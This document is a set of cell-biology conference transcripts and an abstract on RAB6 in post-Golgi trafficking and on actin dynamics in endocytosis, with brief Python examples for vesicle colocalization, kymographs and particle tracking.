But if you remove ELKS by siRNA, you can see that you lose this preferential targeting of exocytosis to these sites on the plasma membrane — this is quantified in this experiment. So you have preferred exocytosis sites, and ELKS seems to be involved in the process. We then looked more carefully at what the role of RAB6 could be in this process. What we did was to take the three cargos I mentioned and quantify the number of vesicles — carrying CD59, TNF-alpha or Collagen X — that are also positive for RAB6. We looked at a late step, at the end of transport, during the exocytosis of these vesicles. If you quantify, you see that more than 70 or 80% of the vesicles containing CD59, for example, are also positive for RAB6, and it is the same for soluble Collagen X and for TNF-alpha. Now, if you look at the exit from the Golgi — the first step — again you quantify the vesicles forming from the Golgi and ask how many of them contain RAB6, and as you can see, the majority of these vesicles also carry RAB6. It is the same along the route, for the vesicles in transit: most of them are positive. So this was in fact a bit surprising; we did not expect RAB6 to be present on so many vesicles. Thomas: if you inhibit Myosin II and you get the tubes, and you now follow Collagen, do the tubes contain the cargo? Yes, we did that experiment with the Collagen cargo, we saw the tubes, and the tubes contain the cargo. But the collagen we heard about forms long filaments, right? Which collagen — what exactly is your question? Collagen is polymerized into fibrils — we heard in Vivek's talk that it is a large cargo. I am curious: if you stop fission and you have these long tubes, do you now see collagen rods inside them, or does it stay as before? I do not think we have looked at that in detail. What we saw is that the collagen signal in these tubes seems to be discontinuous, but honestly I did not pay attention to the organization of collagen inside the tubes. A similar question — are the collagen carriers larger than the others? Yes, so... this is Collagen X; I think Vivek used Collagen VII, no? I do not know. There are many collagens, but only a few form these long fibrils — types I, II and III; the other collagens are rod-like molecules but shorter, so they can be accommodated more easily. When you show these three movies, it seems to me that the collagen exit from the Golgi is more synchronized — it leaves last, but in a wave. It is difficult to say, I do not know exactly. But if you look at CD59, it seems to me it is more continuous. Yes, maybe. We are now analyzing this type of movie in detail, the exact kinetics.
Are the collagen vesicles bigger? It is hard to say — at this resolution you cannot really tell; you do not have the resolution. And TNF-alpha, is it a bit different? No, those carriers are also large; it is difficult to say, we are at the limit. OK, so let me show you this slide. Of course it was important to show — as has been done with VSV-G, which is often used as a benchmark — what the effect on secretion is when you deplete RAB6. I will just show the experiment done with TNF-alpha. This is the control and this is after depletion of RAB6; you quantify the amount of TNF-alpha at the plasma membrane after release, and you see that after 30 or 60 minutes secretion of TNF-alpha is decreased by about 50%. In fact, RAB6 depletion does not block secretion, it just delays it. You can also see, using mouse embryonic fibroblasts from the RAB6 knockout mice, that if you measure total secretion — you just collect the medium and look at the maximum of secreted protein — after one hour more than 50% of total protein secretion into the medium is inhibited. So this is another argument to say that RAB6 is involved in the transport of many types of proteins. The last experiment I want to show you addressed the question of whether RAB6 could be involved in sorting. As you know, one of the functions of the TGN is to sort proteins: proteins going to different destinations are sorted into different populations of vesicles. So what we did, to know whether RAB6 is involved in sorting, was to express two or three cargos in the same cell, look at the vesicles containing one cargo or two cargos, and ask what percentage of these vesicles were positive for RAB6. Let me show you — I think this is with TNF-alpha. If you look at the yellow — I cannot read it from here, but I think it is TNF-alpha and CD59; it does not really matter because the result is always the same, so let's say it is TNF-alpha and CD59 — you see that about 50% of the vesicles contain the two cargos, and you have about 20% of vesicles that contain only one cargo. So the percentage of vesicles containing two cargos is quite high, about 50%. That can be understood: we talked yesterday about this massive synchronized wave of cargo. There is probably sorting between the two cargos, but because you release such a large flow of membrane at once, at some point you probably overwhelm the sorting machinery. Still, you have about 20% of vesicles that contain one cargo and 20% that contain the other, which means that there is sorting: there are vesicles containing the two cargos, but there are also vesicles containing only one. And about 60% of the two-cargo vesicles are positive for RAB6 — but it is the same percentage for the vesicles that contain only one cargo.
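As a rough illustration of the kind of counting described here — what fraction of carriers contain one or both cargos, and what fraction of each class is RAB6-positive — the sketch below matches detected vesicle centroids from two cargo channels and a RAB6 channel by a simple distance threshold. The detection step is assumed to have been done already, and the coordinates, the 0.3 micrometer radius and all names are made up for illustration; this is not the authors' analysis pipeline.

    import numpy as np
    from scipy.spatial import cKDTree

    def has_neighbor(points, others, radius):
        # True where a point in `points` has a partner in `others` within `radius`
        if len(others) == 0:
            return np.zeros(len(points), dtype=bool)
        dist, _ = cKDTree(others).query(points, k=1)
        return dist <= radius

    rng = np.random.default_rng(1)
    cargo_a = rng.uniform(0, 20, size=(120, 2))   # e.g. TNF-alpha vesicle centroids (um)
    cargo_b = rng.uniform(0, 20, size=(110, 2))   # e.g. CD59 vesicle centroids (um)
    rab6    = rng.uniform(0, 20, size=(200, 2))   # RAB6-positive structures (um)

    r = 0.3  # colocalization radius in micrometers (assumed)
    a_with_b  = has_neighbor(cargo_a, cargo_b, r)
    a_with_r6 = has_neighbor(cargo_a, rab6, r)

    print(f"vesicles carrying both cargos: {a_with_b.mean():.0%}")
    print(f"RAB6-positive among two-cargo vesicles:    {a_with_r6[a_with_b].mean():.0%}")
    print(f"RAB6-positive among single-cargo vesicles: {a_with_r6[~a_with_b].mean():.0%}")

The argument in the talk is precisely the comparison of those last two numbers: if the RAB6-positive fraction is the same whether a vesicle carries one cargo or two, RAB6 itself is unlikely to be doing the sorting.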
So this is an argument to say that RAB6 is not involved in the sorting of these vesicles: the vesicles are formed, and RAB6 associates with them regardless of their content. OK, and this is our model — the same scheme as before. Here is the microtubule, and here is the exocytosis site near the focal adhesion. What we propose is that post-Golgi trafficking is controlled by a core machinery made of RAB6, RAB6 effectors and microtubules. Again, this is in non-polarized cells, so we do not know exactly what happens in polarized cells. There are several hypotheses. One, which is relatively simple, is that these exocytosis domains simply reflect the global architecture of the cell, dictated by the organization of the actin and microtubule networks; or maybe it also relates to the functional links that we know exist between Golgi membranes and focal adhesions, links that are important for cell polarization and migration. OK, I think time is almost up — can I take five more minutes to show you the last part? As I told you at the beginning, we are trying to study the function of RAB6 in the context of the organism. To do this we created a conditional RAB6 knockout mouse, using the classical Cre/lox system. RAB6 is in fact an essential gene, required for embryogenesis: mice that are null for RAB6 die at embryonic day 5.5, and the phenotype is exactly the one you find when you knock out beta-1 integrin. If you look at the sections, this is the control situation: at day 5.5 you have the formation of a basement membrane between the two embryonic cell layers. But if RAB6 is not present, you see that this basement membrane cannot form properly. And it is known that beta-1 integrin and beta-1 integrin signalling are required for the formation of this basement membrane. One possibility to explain this phenotype comes from work done in collaboration with Ludger Johannes. What we found is that a pool of inactive integrins is recycled through a retrograde pathway — from the cell surface back to the Golgi and out again — and this pathway for recycling inactive integrins uses RAB6 and the retrograde machinery. This may be why we see this phenotype during development. OK, so what we then did was to cross this mouse with many different mouse lines to delete RAB6 in specific cell lineages. I will show you two examples that have been published. To study the role of RAB6 in melanogenesis, we crossed this mouse with a melanocyte-specific Cre line; if you look at the resulting mouse, which cannot express RAB6 in melanocytes, you see that it has a pigmentation defect. Now, if you look at melanosomes in melanocytes — I will not go into the details of pigmentation — this is a normal melanocyte, which expresses RAB6.
So this is the control melanocyte, and if you delete RAB6 you see that there is much less melanin in the melanosomes. This is published work, so I will go quickly, but if you look carefully — this is a melanosome, let me show it again — you see RAB6-positive vesicles moving towards and contacting the melanosome. The interpretation of these data is the following: in these cells RAB6 defines a pathway that directly connects the Golgi to stage III, or maturing, melanosomes, and this pathway is important for these melanosomes. So in this case — and I think this is quite interesting — part of the secretory pathway I told you about a moment ago seems, in this specialized cell type, to be diverted towards the melanosome, and this diverted pathway uses the same machinery; I do not have time to show it, but the ELKS protein is also important for the targeting of these vesicles to melanosomes. I cannot show you all the data, but let me summarize it because it is important for my last message. This is a paper we recently published in the Journal of Experimental Medicine, now on T-cell signalling — again a collaboration, with Claire Hivroz, also at the Institut Curie. Here we crossed the RAB6-floxed mice with a T-cell-specific Cre line, so in this case you delete RAB6 in the T-cell lineage. Just a brief introduction: we are now talking about the T-cell receptor and T-cell signalling. As you know, many proteins are involved, and one of them, called LAT, is part of the T-cell receptor signalling complex. LAT in fact cycles between the plasma membrane and an intracellular vesicular pool. And if you look at...
...what happens in the RAB6 knockout mice — again, I will not go into detail — you see a defect in the ability of these T cells to form a proper immunological synapse, and you also have a strong inhibition of T-cell activation. The interpretation of this result, shown briefly here, is that RAB6 does not seem to be directly involved in the anterograde transport of LAT or of other proteins to the membrane; rather, the phenotype can be explained by an effect on the role of RAB6 in retrograde transport. You deplete RAB6, you inhibit retrograde transport, and that is why you have this effect on T-cell activation. OK, so this is my conclusion. As I showed you, RAB6 seems to be an essential protein that controls many transport steps, but it appears to be involved in specific transport pathways depending on the cell type and tissue. The question we have now is why — what we think is that there is a plasticity of intracellular trafficking, with a cell-type-specific set of effectors, and we are trying to understand, in each cell type and tissue, what the function of RAB6 could be. And finally, the people who did the work: most of what I presented today was done by my co-worker Stéphanie Miserey-Lenkei, a PhD student, a very good engineer, and a former postdoc, Carina; the main collaborations were with Franck Perez, Anna Akhmanova, Ludger Johannes, Cédric, Graça Raposo, Claire Hivroz and Marina Glukhova — most of them local collaborations at the Institut Curie. Thank you. [Applause] Sorry, I took all the time. The data are really convincing, but I am a bit confused by the overall picture, because it seems as if RAB6 is involved in everything. Do you see it more as a general regulator of post-Golgi transport, independent of what the destination is? Because you have implicated RAB6 in secretion, in retrograde transport, and in transport to melanosomes. Is there another determinant — another RAB or something else — that adds specificity to these vesicles, with RAB6 being just a general factor? Or, as you said, does RAB6 do very specific things in different cell types, and it only looks like it does everything because you are mixing all the contexts together, while in each cell there is one specific function? That is a very good question — it is why we are trying to do this work in mice. I think one of the main functions of RAB6, which may not be related to retrograde transport, is that RAB6 is a major protein involved in the targeting of these vesicles: at the end of the microtubule they are targeted — the role of RAB6 is targeting. You have RAB6, you have this protein ELKS, or CAST, and this targets the vesicle — probably every kind of vesicle that goes to the plasma membrane for exocytosis. The function of RAB6 in retrograde transport may not be disconnected from this — maybe not directly, but...
...RAB6, at steady state, is on the Golgi membranes, and you have these vesicles coming from endosomes; RAB6 can be involved, through the GARP complex — a VPS complex — in the tethering of vesicles coming from endosomes with the Golgi membranes. So in both situations the same protein may be performing the same kind of task. But what about RAB8 — are these different vesicles? RAB8... what Akhmanova has proposed is that there is in fact a cascade between RAB6 and RAB8. Anna thinks that the vesicles moving from the Golgi carry both RAB6 and RAB8: RAB6 would be involved in targeting to the plasma membrane and RAB8 would be more involved in the fusion process, but this is not completely settled. OK, maybe one last, very short question. My question is: there is clearly a link with microtubules, but what you said that is remarkable is that specific microtubules are used. How do you think this specificity is achieved? Do you think these microtubules are nucleated at the Golgi, and that this is why they repeatedly carry out the same transport? And how do you make sure that the vesicles get onto the right microtubules? That is a good question. Yes, we think these microtubules are nucleated at the Golgi. We are now doing an experiment with knockout cells that cannot form microtubules from the Golgi membranes, and that will be one way to answer your question. But do you think RAB6 is directing the specificity for particular microtubules? No, I do not think RAB6 is directly involved in nucleating specific microtubules. I mean in making sure the vesicles get onto the right ones, because obviously not all microtubules lead to the same place. Yes, I think that is a good question, but we do not know.
|
The members of the RAB GTPase family (more than 60 proteins in man) are master regulators of intracellular transport and membrane trafficking in eukaryotic cells. RAB6 is one of the five ancestral RAB genes conserved from yeast to human. The RAB6 family comprises four proteins, named RAB6A, RAB6A’, RAB6B and RAB6C. The two ubiquitously expressed isoforms, RAB6A and A’, are generated by alternative splicing of the same gene and localize to the Golgi complex. We and others have established that RAB6 regulates several transport pathways at the level of this organelle. Our recent work has focused on several aspects of RAB6 function: -The mechanisms involved in the fission of RAB6-positive transport carriers from Golgi/TGN (Trans-Golgi Network) membranes. We have previously shown that RAB6-Myosin IIA interaction is critical for this process [1]. Recently, we showed that the kinesin protein KIF20A is also involved in the fission process and serves to anchor RAB6 on Golgi/TGN membranes near microtubule (MT) nucleating sites. Our results suggest that the coupling between actin and MT cytoskeletons driven by Myosin II and KIF20A ensures the spatial coordination between the fission of RAB6-positive vesicles from Golgi/TGN membranes and their exit along microtubules [2]. - The role of RAB6 in post-Golgi transport. Using the RUSH system [3] and a variety of secretory cargos, including GPI-anchored proteins, TNF-alpha and Collagen-X, we found that RAB6 associates with post-Golgi vesicles containing all of these cargos. Depletion of RAB6 inhibits their arrival at the plasma membrane. These results suggest that RAB6 could be a general regulator of post-Golgi vesicles, possibly targeting secretory vesicles to defined exocytic sites on the cell surface [4]. -The role of RAB6 in cell lineages and tissues. We have generated mice with a conditional null allele of RAB6A [5]. The mice, which do not express RAB6A and RAB6A’, die at an early stage of embryonic development (day 5.5), indicating that RAB6A is an essential gene. The phenotype of RAB6A-/- embryos is very similar to that of beta-1 integrin null embryos. This result is consistent with the finding that a pool of inactive integrins follows the retrograde pathway regulated by RAB6 and that this pathway is critical for adhesion and persistent cell migration [6]. The RAB6 k/o mice were crossed with several mouse lines to deplete RAB6 in various tissues or cell lineages. We will present data illustrating that RAB6 fulfills different functions depending on the cell or tissue context. References 1. Miserey-Lenkei et al. Nat. Cell Biol. 12, 645 (2010). 2. Miserey-Lenkei et al. Nat Commun. 8, 1254 (2017). 3. Boncompain et al. Nat. Methods 9, 493 (2012). 4. Miserey-Lenkei et al. submitted for publication. 5. Bardin et al. Biol. Cell 107, 427 (2015). 6. Shafaq-Zadah, Gomes-Santos, et al. Nat. Cell Biol. 18, 54 (2015).
|
10.5446/50885 (DOI)
|
Thank you very much. I'd like to thank the organizers, Mikhail, Annak, Nadia, and Nava for the opportunity to be here at this very, very interesting, enjoyable conference. Today I will tell you about our studies on the role of actin dynamics in endocytic trafficking. And we haven't heard enough about the cytoskeleton here yet. So I thought I'd start off with a picture of the actin cytoskeleton, which is one of the main subjects of study in my lab. This is a scheme made by Dyche Mullins and Tom Pollard, which shows the force-generating machine that's responsible for the motility of cells and for other types of mechanical force generation in cells that use the actin cytoskeleton. So here the plasma membrane is depicted up here. The outside of the cell is up here, and this is the inside of the cell. And what happens is there's sort of a short signaling cascade that activates a protein complex called the Arp2/3 complex, depicted here in green, which then binds to the side of a preexisting actin filament and then makes a branch on that actin filament, and actin monomers polymerize, and through a Brownian ratchet motion, this actin actually polymerizes at this so-called barbed end of the actin filament, or plus end, and can generate a pushing force on the plasma membrane. And this whole process involves a cycle of assembly and disassembly, and it's very interesting because actin assembles as an ATP-bound protein, but then a short time after assembly a couple of things happen: a protein called capping protein caps the filaments. So filaments only grow for a couple of seconds before they're capped, and that's very important because the filaments must remain short if they're going to be able to resist the tension of the plasma membrane as they push on it. And then also, a short time after the actin assembles in these filaments, the ATP gets hydrolyzed to ADP, and that actually makes the filament susceptible to severing by a protein called cofilin, and cofilin severs the filaments, and then other proteins regenerate a pool of monomers which get recharged with ATP, and then the cycle continues, and so you get this constant assembly and pushing against the plasma membrane by this actin network. And this has been worked out in great detail, where we know rate constants, concentrations, binding constants for all of the key factors involved in this process. This is through many labs, largely Tom Pollard's lab as well as Marie-France Carlier's just down the road in Gif. And so for our work, this has been a really important framework for our studies, because what attracted us to endocytosis — because we're really a cytoskeleton lab and many of the projects in my lab actually have nothing to do with membranes, just have to do with actin assembly — is that it turned out in budding yeast, where we began most of our studies, including endocytosis, the assembly of actin, here shown in red, is absolutely essential to invaginate the membrane and to pull off endocytic vesicles, for the vesicles to undergo scission. And so we study this system as a way to study, in a biological context, how the forces generated by the assembling actin are harnessed to do work for biological processes, and it's proved to be a very nice model, and I should say my lab is sort of split half in yeast and half in mammalian cells. So how did we get involved in all this? Well, we were working in budding yeast some time ago and we started identifying proteins that regulate actin.
The first one that I found as a postdoctoral fellow, I called ABP1 for actin binding protein 1, because it was the first actin binding protein found in yeast. Through genetics and biochemistry, we and others found many other proteins that interacted with ABP1 and with each other, using a synthetic lethal screen of the type Charlie Boone mentioned. We found a gene called SLA1, for synthetic lethal with ABP1. What was curious, as we started to work out this network, is that a number of proteins that were entangled in this interaction network of physical and functional interactions were proteins that had been implicated in endocytosis. And at that time, in the 1990s, there really wasn't any good reason to think that those two processes were directly involved with each other. And that was something that we found curious. We kept running into genes, for example, called END genes that someone named Howard Riezman in Geneva was studying, because he was studying endocytosis in yeast cells. But we didn't really know exactly what to make of it. So then this was around the time that, after GFP had been found and different spectral variants of GFP had been found, it was possible to start doing live cell two-color imaging. And I had a new postdoc in my lab named Marco Kaksonen who was very interested in this problem of how these proteins were working with each other. And he decided to set to work by tagging pairwise combinations of proteins in this network with green fluorescent protein and red fluorescent protein and looking at live cells expressing both proteins at the same time. So doing two-color imaging. And so one of the first pairs he looked at: he tagged ABP1 and SLA1. This SLA1 protein turns out to be interesting because it's an endocytic adapter. It binds directly to endocytic cargo — to the pheromone receptor in budding yeast. And so this is what Marco saw. Now, first of all, other people had started to look at these proteins, and they did this by looking at static images of cells. And there was a paper published, for example, that looked at actin — here the red is a surrogate for actin — and an endocytic protein here in green, and concluded that for the most part they were present in different structures in a yeast cell. You know, occasionally you would see some yellow, which meant that the two proteins were together, but it's hard to know, when it's just a low level of coincidence, what to make of that. But the real significance of this interaction, and the explanation for how these proteins are functioning together in a network, comes when you do two-color live cell imaging. And Marco did a couple things differently from what other people did. One is he looked at two colors in real time, and another is he used a medial focal plane. So yeast cells are spherical. And if you use a medial focal plane, you're really focused on the surface of the cell just around the edges. And you can see that all of these dot structures, which we call patches, are present on the surface of the cell. Okay? Now, if you watch in real time, you see something really interesting. And that is that every single patch undergoes a very similar dynamic process. When it first appears on the surface, it's green. And then invariably, that green patch turns yellow. In other words, first an endocytic adapter appears on the surface of the cell, and then actin filaments start to assemble at that site a short time later. It happens in a very predictable order.
First the endocytic adapter and then the actin. And then if you really study, it's amazing, a simple movie like this. A question came up the other day in the discussion: you know, what can you learn from live cell imaging? And with a simple movie like this, it's amazing what you can learn. One of the things, if you really study this movie, that you start to notice is that just when these patches start to turn yellow, they move off of the surface into the cytoplasm. Okay? As though perhaps the forces from actin polymerization are driving some sort of structure from the surface of the cell into the cytoplasm. You can depict that nicely by making something called a kymograph, where you draw a line through one of these patches and sample that line in every frame of a movie. And then you can see that this endocytic protein here is present over time on the surface of the cell. Then there's this burst of actin polymerization, and at exactly that moment the endocytic protein starts to curve off of the surface of the cell into the cell's interior. Okay? Showing there's a very tight correlation between the assembly of actin and the movement of this structure into the interior of the cell. So we've done this experiment over and over again with a lot of pairwise permutations. It turns out there's about 50 or 60 proteins that are in this network. And what we ended up with is this, which summarizes quite a few years of work from my lab and other labs in the field. And what it shows is a cartoon of what we think is happening on the surface of the cell. We think that some endocytic proteins start to accumulate, cargo starts to get captured, and then there's a burst of actin polymerization. The forces from that actin polymerization are harnessed to invaginate the membrane and pull off a vesicle. And then along that timeline, and color-coded with the cartoon above, are about 50 proteins that we have ordered in this pathway, all by doing different pairwise permutations of labeled proteins. For example, that SLA1 protein that I told you is an endocytic adapter is here, and ABP1, which I showed you in the pair, is here. And so SLA1 arrives, and then predictably ABP1 also arrives, with actually a very predictable and minimally variable amount of time between the appearance of these proteins. So what we've done is built this temporal map for the recruitment of many different proteins to these sites of endocytosis. And when you do this for 50 proteins, it gives you kind of a holistic view of this very complex pathway and series of events. And so one thing you can do — you know, it's really hard to think about the functions of 50 or 60 proteins, at least for me — is you start to see that you can cluster groups of proteins together within the pathway. For example, early proteins were things like coat proteins, and you can do that by looking at genetic interactions, physical interactions, the dynamics of the proteins, the lifetimes of proteins, phenotypes when you knock out proteins. And you know, what we realized is that you could cluster these 50 proteins into maybe four or five groups of proteins. And then we developed the concept that these were modules of proteins, and each module was carrying out a function. And so the first module proteins, shown in green and light blue, are sort of a coat that, you know, would create the coat of the vesicle and also capture cargo.
This blue module contains proteins that would link the coat to machinery that nucleates actin assembly; then the machinery that nucleates actin assembly, shown in purple here, and that generates forces on the actin, would get recruited. So a WASP protein that activates this Arp2/3 complex to nucleate actin, a myosin that generates forces on actin. These proteins start to accumulate. Interestingly, there are a lot of multivalent proteins. There are SH3 and proline-rich proteins here. We think that there might be a phase transition involved — we published a paper last year on this — in linking the actin assembly to this endocytic coat, because there seems to be a threshold effect where having these multivalent interactions concentrates the activators of the Arp2/3 complex: what happens is we reach a threshold level of a couple of key proteins, and then there's this transient burst of actin assembly. And the reason that it was so hard for people to detect an association of actin with the endocytic machinery earlier is because this interaction is so transient. Okay, transiently, there's a burst of actin assembly. Knowing when things get recruited in the pathway can generate ideas about what things might be doing, so the actin is recruited very late, when the vesicle internalizes, suggesting it's generating a force. These BAR proteins come really late in the pathway, suggesting they might be involved in scission, which was again verified by genetics. Now, key to a lot of this work and our ability to make such a precise pathway was the fact that in yeast we could precisely integrate GFP and RFP into the genome, because homologous recombination is very robust in yeast, and so we could look at the dynamics of each of these proteins expressed at their native levels, because we didn't have to do what was commonly done in mammalian cells, which is to make a cDNA of a gene you're interested in, clone GFP or RFP behind it and then reintroduce it into cells — in other words, over-express that protein on top of the endogenous proteins. So our eyes started looking towards mammalian cells, because a number of proteins in that network that we found in budding yeast had homologs — almost all of them did — in mammalian cells, and a great number of them were unstudied, and so we decided, why don't we study them? And then when we decided to look at the dynamics in mammalian cells, we decided to use genome editing to make precise integrations. So for example, we tagged the clathrin coat with RFP and the dynamin protein that mediates the scission of the vesicle with GFP, but we did this using first zinc fingers, but nowadays CRISPR-Cas9, to make a precise integration of these tags. And so, as Tommy showed you yesterday, you can now look at these events in real time in mammalian cells, and many other labs have done this, including Tommy's before us, but I think one innovation we made was to do this at endogenous levels by genome editing. So here you could see the red clathrin coat appearing in this TIRF movie. This is an early TIRF movie of ours, and then each of these spots very predictably would turn sort of yellow and green when the dynamin would come to mediate the fission event. And so it's a fair amount of trouble to do the genome editing, and you can ask, is it worth that extra work?
And so one way we looked at this question was to compare cells in which we had overexpressed clathrin and dynamin as RFP and GFP fusions to cells where they were endogenously tagged. And so to do this, we made 3D kymographs. So I showed you a 2D kymograph before, but in this case we took a four-minute movie like this and showed the entire movie in one picture by putting time in the z dimension. So these are basically a stack of frames from a movie, and you can see each endocytic site when we overexpressed clathrin and dynamin, and you can see that the two colors kind of blur together, and so it's really hard to distinguish if one protein is arriving much before the other, and that sort of thing, when you overexpress the proteins. But when you genome edit the cells, you find that there's a nice period when the clathrin is assembling and you have primarily clathrin, and then the end of the process is punctuated when dynamin is recruited and vesicle scission occurs. So we think that having these genome-edited cells — and we now have probably, I don't know, 130, 140 lines in the lab with various proteins engineered — allows us more sensitivity both to look at the normal cells and also to look for effects of perturbations in the cells. But we also, coming from a yeast background, wanted to try to more closely replicate some of the features of yeast cells — and oh, sorry, this shows you sort of a profile of looking at the average: you can look at the kinetics of clathrin recruitment and dynamin recruitment, clathrin largely comes first, and there's a spike of dynamin and the two disappear together when a vesicle forms. Okay, so what are the other sources of variation, maybe from one lab to another, one experiment to another? Different labs were looking at cell lines in mammalian cells from different species, different cell types, fibroblasts versus, whatever, liver cells. Almost all the cells that are studied in tissue culture have chromosome abnormalities because they're cancer cells, and those cancer cells are in a cancerous state; they don't represent normal physiology.
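The 2D and 3D kymographs described above come down to simple array operations: sample the intensity along a fixed line in every frame (2D), or keep whole frames and treat time as a third axis (3D). Here is a minimal sketch with a synthetic movie standing in for real data; the spot geometry and dimensions are invented purely to make the example run.

    import numpy as np

    def kymograph(movie, r0, c0, r1, c1, n_samples=100):
        # movie: array of shape (T, H, W); returns (T, n_samples) intensities
        # sampled along the line from (r0, c0) to (r1, c1) in every frame
        rows = np.linspace(r0, r1, n_samples).round().astype(int)
        cols = np.linspace(c0, c1, n_samples).round().astype(int)
        return movie[:, rows, cols]

    # synthetic movie: a bright patch that sits on the "surface", then moves inward
    T, H, W = 60, 64, 64
    movie = np.zeros((T, H, W))
    for t in range(T):
        r = 10 if t < 40 else 10 + (t - 40)   # internalization starts at frame 40
        movie[t, r, 32] = 1.0

    kymo = kymograph(movie, 0, 32, 63, 32)    # line drawn through the patch
    volume = np.moveaxis(movie, 0, -1)        # "3D kymograph": (H, W, T), time along z
    print(kymo.shape, volume.shape)           # (60, 100) and (64, 64, 60)

In the 2D kymograph, a stationary patch appears as a straight vertical streak and internalization shows up as the hook-like bend described in the talk; the 3D version is just the same movie reinterpreted as a volume so that every site's whole history is visible in one rendering.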
So we wanted to establish a robust system where we could study cell proteins at their endogenous level in as close to the normal physiological state as possible, and what we chose to do is to start studying stem cells, and we used this stem cell line from Bruce Conklin's lab at UCSF called WTC — it's an induced pluripotent stem cell line; we've also used ES cells. And this is a karyotype of a HeLa cell, and you can see the chromosome numbers are quite aberrant: there are five copies of some chromosomes and three of others, there are massive translocations, and this, I should note, is a snapshot of a cell, because these cancer cell lines are not stable — when you have this kind of karyotype it's constantly changing; this is a snapshot of a dynamic change. For one thing, chromosome instability is a hallmark of cancer cells, whereas you can get stem cells that actually have a normal karyotype and normal physiology and by many indications are normal. And so we decided a few years ago to start doing all of our genome editing in stem cells. There are other advantages: you can take your stem cells and you can induce them into many different cell types, so now you can compare a cellular process like endocytosis in cells that are genetically identical — okay, the only difference is the epigenetics; you're differentiating them into different cell types. And at first we've concentrated on comparing the stem cells to fibroblasts and neural progenitors. So we've made a bank of genome-edited stem cells that we then differentiate into these different cell types, and it's really interesting, because if you look — this is my postdoc Daphné Dambournet's work, in a collaboration with Justin Taraska — if you look in the stem cells by EM, we see sort of large clathrin-coated vesicles; when we differentiate them into fibroblasts we see these large structures that have been referred to as plaques, which often seem to have vesicles emerging from their sides; and then neural progenitor cells have super-fast endocytosis with extremely regular, smaller vesicles. And this EM-level ultrastructure recapitulates very well what we see when we look at the dynamics in real time, and we've begun to dissect what's happening as cells differentiate to adapt this pathway for these different cell types. And we think, because it's an isogenic model, we now have a lot of control to do very well-controlled experiments and to really get to the source of these different phenotypes.
The other thing that you can do with stem cells is to make organoids. Okay, so again, if we want to get closer to physiology — and we heard about this yesterday from Tommy, and it was beautiful, the zebrafish studies — another, I think complementary, way is to make organoids. In this case we're looking at an intestinal organoid. This is Daphné Dambournet — she's French, from Paris — and a collaborator in Dirk Hockemeyer's lab at Berkeley, Ryan Forster, who's helped us make organoids. And these epithelial cells have an apical surface, which happens to be in the lumen, and then this basolateral surface, and so, you know, in real cells, in tissues, there's stuff like cell-cell interactions and polarity, where different activities are happening at different surfaces. And so we think ideally what we want to do is to be able to watch these things in organoids, and Tommy already showed you that we also collaborated with the Betzig lab to start imaging these things. And I just wanted to mention, if you look at a volume like this — Tommy alluded to this too — one of the problems that is becoming really acute with these advanced microscopes, like the lattice light sheet with adaptive optics, is the amount of data that you can generate. And so, in this first frame here, we just did some simple segmentation, just looking at the nuclear volumes and starting to look at the membranes, and with commercial software, you know, a file like this gets to be about two gigabytes, which is the point at which you start overwhelming commercial software. For one of our movies from our study with Eric Betzig — Daphné spent just eight days at Janelia Farm, she generated 30 terabytes of data, and a typical movie like this one is 72 gigabytes — it's hard to manipulate these kinds of images, and it's hard to do particle tracking. And so we have a team now of people who are trying to catch up with Tommy, who can develop software for analyzing these things. So these three folks — a student, a postdoc, and an undergraduate computer science major — have all been improving our particle tracking software for 2D, and then Joe Schoenberg, who's a new data science fellow in the lab, has now got things working well in 3D, so we can start to look at these things. And, you know, this is a movie that compares different modes with the lattice light sheet, and you can see, with the adaptive optics, you can hopefully start to see the individual endocytic events and start to quantify things in real time. This is part of a paper that Tommy and I are both authors on, that will be out in Science sometime soon, with Eric Betzig's lab. So this is what was done in Betzig's lab — Tommy actually showed this movie yesterday — so that's now with the adaptive optics, and this is with particle tracking from Tommy's lab. Okay, so with this project, you know, we started with intestinal organoids, but there are a lot of people on my campus who are interested in making other things, and so Joe, this data science fellow, is now making brain organoids with another lab, and I think the organoids are complementary to things like zebrafish, because you can make many different tissue types, you can create huge banks of stem cells, and there are now resources. One of the things that people in, say, the yeast or Drosophila field enjoy are shared resources of knockout collections, tagged gene collections, and so on and so forth.
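Since particle tracking keeps coming up, here is a toy version of the simplest linking strategy it is built on: frame-to-frame nearest-neighbour matching with a maximum displacement. Real trackers (including the ones mentioned above) handle gap closing, merging and motion models; every name and the 0.5-unit search radius below are assumptions made just for the sketch.

    import numpy as np
    from scipy.spatial import cKDTree

    def link_frames(detections, max_disp):
        """detections: list of (N_t, D) arrays of spot coordinates, one per frame.
        Returns a list of tracks, each a list of (frame_index, coordinate) pairs."""
        tracks = [[(0, p)] for p in detections[0]]
        open_tracks = list(range(len(tracks)))
        for t in range(1, len(detections)):
            pts = detections[t]
            prev = np.array([tracks[i][-1][1] for i in open_tracks])
            assigned, next_open = set(), []
            if len(pts) and len(prev):
                dist, idx = cKDTree(pts).query(prev, k=1)
                for j, i in enumerate(open_tracks):
                    if dist[j] <= max_disp and idx[j] not in assigned:
                        tracks[i].append((t, pts[idx[j]]))
                        assigned.add(int(idx[j]))
                        next_open.append(i)
            # detections not claimed by an existing track start new tracks
            for k, p in enumerate(pts):
                if k not in assigned:
                    tracks.append([(t, p)])
                    next_open.append(len(tracks) - 1)
            open_tracks = next_open
        return tracks

    # toy example: two spots drifting slowly in 3D over five frames
    rng = np.random.default_rng(2)
    frames = [np.array([[1.0, 1.0, 1.0], [5.0, 5.0, 5.0]]) + 0.1 * t
              + rng.normal(0, 0.02, (2, 3)) for t in range(5)]
    tracks = link_frames(frames, max_disp=0.5)
    print(len(tracks), "tracks; lengths:", [len(tr) for tr in tracks])

The point of the sketch is only the bookkeeping: once detections are linked into tracks, per-event quantities such as lifetimes or displacements fall out directly.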
